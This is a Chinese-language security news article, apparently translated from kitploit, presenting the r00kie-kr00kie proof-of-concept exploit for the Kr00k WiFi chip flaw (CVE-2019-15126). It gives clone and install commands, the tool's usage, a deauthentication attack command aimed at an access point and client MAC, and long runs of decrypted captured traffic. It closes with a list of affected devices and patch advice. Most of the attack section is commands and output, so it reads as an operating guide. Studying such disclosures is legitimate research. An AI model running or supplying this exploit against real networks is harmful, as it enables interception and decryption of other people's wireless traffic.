在野出现WiFi芯片Kr00k漏洞PoC(CVE-2019-15126)
2020-04-03 12:00:00 Author: www.4hou.com(查看原文) 阅读量:291 收藏

Kr00k漏洞是Broadcom和Cypress WiFi芯片中的安全漏洞,攻击者利用该漏洞可以部分解密WPA2加密流量,泄露无线网络数据包中的数据。因为Broadcom和Cypress WiFi广泛应用于手机、平板、笔记本和IOT设备中。根据初步估计,有超过10亿设备受到该漏洞的影响。

要使用这些脚本,需要一个支持活动监控器模式和帧注入功能的WiFi卡,我们推荐用于开发和测试代码的Atheros AR9280芯片(IEEE 802.11n),我们已经在Kali Linux上测试了此PoC

安装

 # clone main repo
 git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
 # install dependencies
 sudo pip3 install -r requirements.txt

使用

脚本:r00kie-kr00kie.py

这是实施kr00k攻击的主要漏洞利用文件

 ->~:python3 r00kie-kr00kie.py -h
 
 usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
                          [-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
                          [-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]
 
 PoC of CVE-2019-15126 kr00k vulnerability
 
 optional arguments:
   -h, --help            show this help message and exit
   -i INTERFACE, --interface INTERFACE
                         Set wireless interface name for listen packets
   -l CHANNEL, --channel CHANNEL
                         Set channel for wireless interface (default: 1)
   -b BSSID, --bssid BSSID
                         Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
   -c CLIENT, --client CLIENT
                         Set WiFi client MAC address (example:
                         "01:23:45:67:89:0b")
   -n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
                         Set number of deauth packets for one iteration
                         (default: 5)
   -d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
                         Set delay between sending deauth packets (default: 5)
   -p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
                         Set path to PCAP file for read encrypted packets
   -r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
                         Set path to PCAP file for write decrypted packets
   -q, --quiet           Minimal output

为了发起攻击,需要知道访问点的bssid,其通道和受害者的mac地址,可以使用该airodump-ng wlan0找到它们。

运行漏洞利用代码:

 ->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11
 
       /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$
      | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/
      | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
      | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
      | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
      | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
      | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
      |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/
 
 
 
  /$$                  /$$$$$$   /$$$$$$  /$$       /$$
 | $$                 /$$$_  $$ /$$$_  $$| $$      |__/
 | $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
 | $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
 | $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
 | $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
 | $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
 |__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/
                                                           v0.0.1
 
                     https://hexway.io/research/r00kie-kr00kie/
 
 [!] Kill processes that prevent monitor mode!
 [*] Wireless interface: wlan0 already in mode monitor
 [*] Set channel: 11 on wireless interface: wlan0
 [*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
 [*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
 [*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
 [+] Got a kr00ked packet:
 ###[ Ethernet ]###
   dst       = d4:38:9c:82:23:7a
   src       = 88:c9:d0:fb:88:d1
   type      = IPv4
 ###[ IP ]###
      version   = 4
      ihl       = 5
      tos       = 0x0
      len       = 60
      id        = 30074
      flags     = DF
      frag      = 0
      ttl       = 64
      proto     = udp
      chksum    = 0xcce1
      src       = 192.168.43.161
      dst       = 8.8.4.4
      \options   \
 ###[ UDP ]###
         sport     = 60744
         dport     = domain
         len       = 40
         chksum    = 0xa649
 ###[ DNS ]###
            id        = 55281
            qr        = 0
            opcode    = QUERY
            aa        = 0
            tc        = 0
            rd        = 1
            ra        = 0
            z         = 0
            ad        = 0
            cd        = 0
            rcode     = ok
            qdcount   = 1
            ancount   = 0
            nscount   = 0
            arcount   = 0
            \qd        \
             |###[ DNS Question Record ]###
             |  qname     = 'g.whatsapp.net.'
             |  qtype     = A
             |  qclass    = IN
            an        = None
            ns        = None
            ar        = None
 
 [+] Got a kr00ked packet:
 ###[ Ethernet ]###
   dst       = d4:38:9c:82:23:7a
   src       = 88:c9:d0:fb:88:d1
   type      = IPv4
 ###[ IP ]###
      version   = 4
      ihl       = 5
      tos       = 0x0
      len       = 60
      id        = 30075
      flags     = DF
      frag      = 0
      ttl       = 64
      proto     = udp
      chksum    = 0xcce0
      src       = 192.168.43.161
      dst       = 8.8.4.4
      \options   \
 ###[ UDP ]###
         sport     = 60744
         dport     = domain
         len       = 40
         chksum    = 0x104b
 ###[ DNS ]###
            id        = 28117
            qr        = 0
            opcode    = QUERY
            aa        = 0
            tc        = 0
            rd        = 1
            ra        = 0
            z         = 0
            ad        = 0
            cd        = 0
            rcode     = ok
            qdcount   = 1
            ancount   = 0
            nscount   = 0
            arcount   = 0
            \qd        \
             |###[ DNS Question Record ]###
             |  qname     = 'g.whatsapp.net.'
             |  qtype     = AAAA
             |  qclass    = IN
            an        = None
            ns        = None
            ar        = None

此外,如果kr00t攻击后已经拦截了流量(pcap文件),则可以解密:

 ->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap
 
       /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$
      | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/
      | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
      | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
      | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
      | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
      | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
      |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/
 
 
 
  /$$                  /$$$$$$   /$$$$$$  /$$       /$$
 | $$                 /$$$_  $$ /$$$_  $$| $$      |__/
 | $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
 | $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
 | $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
 | $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
 | $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
 |__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/
                                                           v0.0.1
 
                     https://hexway.io/research/r00kie-kr00kie/
 
 [*] Read packets from: encrypted_packets.pcap ....
 [*] All packets are read, packet analysis is in progress ....
 [+] Got a kr00ked packet:
 ###[ Ethernet ]###
   dst       = d4:38:9c:82:23:7a
   src       = 88:c9:d0:fb:88:d1
   type      = IPv4
 ###[ IP ]###
      version   = 4
      ihl       = 5
      tos       = 0x0
      len       = 490
      id        = 756
      flags     = DF
      frag      = 0
      ttl       = 64
      proto     = tcp
      chksum    = 0xd0ca
      src       = 192.168.43.161
      dst       = 1.1.1.1
      \options   \
 ###[ TCP ]###
         sport     = 34789
         dport     = 1337
         seq       = 3463744441
         ack       = 3909086929
         dataofs   = 8
         reserved  = 0
         flags     = PA
         window    = 1369
         chksum    = 0x65ee
         urgptr    = 0
         options   = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
 ###[ Raw ]###
            load      = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'
 
 [+] Got a kr00ked packet:
 ###[ Ethernet ]###
   dst       = d4:38:9c:82:23:7a
   src       = 88:c9:d0:fb:88:d1
   type      = IPv4
 ###[ IP ]###
      version   = 4
      ihl       = 5
      tos       = 0x0
      len       = 60
      id        = 42533
      flags     = DF
      frag      = 0
      ttl       = 64
      proto     = tcp
      chksum    = 0x2f47
      src       = 192.168.43.161
      dst       = 1.1.1.1
      \options   \
 ###[ TCP ]###
         sport     = 34792
         dport     = 1337
         seq       = 71773087
         ack       = 0
         dataofs   = 10
         reserved  = 0
         flags     = S
         window    = 65535
         chksum    = 0x97df
         urgptr    = 0
         options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]
 
 [+] Got a kr00ked packet:
 ###[ Ethernet ]###
   dst       = d4:38:9c:82:23:7a
   src       = 88:c9:d0:fb:88:d1
   type      = IPv4
 ###[ IP ]###
      version   = 4
      ihl       = 5
      tos       = 0x0
      len       = 1460
      id        = 35150
      flags     = DF
      frag      = 0
      ttl       = 64
      proto     = tcp
      chksum    = 0x46a6
      src       = 192.168.43.161
      dst       = 1.1.1.1
      \options   \
 ###[ TCP ]###
         sport     = 36020
         dport     = 1337
         seq       = 395101552
         ack       = 1111748198
         dataofs   = 8
         reserved  = 0
         flags     = A
         window    = 1369
         chksum    = 0x35d2
         urgptr    = 0
         options   = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
 ###[ Raw ]###
            load      = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"
 
 [+] Got a kr00ked packet:
 ###[ Ethernet ]###
   dst       = d4:38:9c:82:23:7a
   src       = 88:c9:d0:fb:88:d1
   type      = IPv4
 ###[ IP ]###
      version   = 4
      ihl       = 5
      tos       = 0x0
      len       = 60
      id        = 17897
      flags     = DF
      frag      = 0
      ttl       = 64
      proto     = tcp
      chksum    = 0x8f83
      src       = 192.168.43.161
      dst       = 95.85.25.177
      \options   \
 ###[ TCP ]###
         sport     = 36266
         dport     = 1337
         seq       = 3375779416
         ack       = 0
         dataofs   = 10
         reserved  = 0
         flags     = S
         window    = 65535
         chksum    = 0x2c7d
         urgptr    = 0
         options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]
 
 [+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap

脚本:traffic_generator.py

该UDP脚本从受害者处拦截流量,以演示kr00k攻击:

 ->~:python3 traffic_generator.py
 Sending payload to the UDP port 53 on 8.8.8.8
  Press Ctrl+C to exit

以下设备受到Kr00k漏洞的影响:

· Amazon Echo 2

· Amazon Kindle 8

· 苹果 iPad mini 2

· 苹果 iPhone 6, 6S, 8, XR

· 苹果 MacBook Air Retina 13-inch 2018

· Google Nexus 5

· Google Nexus 6

· Google Nexus 6S

· Raspberry Pi 3

· 三星 Galaxy S4 GT-I9505

· 三星 Galaxy S8

· 小米Redmi 3S

· Asus RT-N12

· 华为 B612S-25d

· 华为 EchoLife HG8245H

· 华为 E5577Cs-321

目前Broadcom和 Cypress已经发布了固件补丁给相关厂商,建议用户尽快安装相关补丁。

本文翻译自:https://www.kitploit.com/2020/03/r00kie-kr00kie-poc-exploit-for-cve-2019.html如若转载,请注明原文地址:


文章来源: https://www.4hou.com/posts/A9yO
如有侵权请联系:admin#unsafe.sh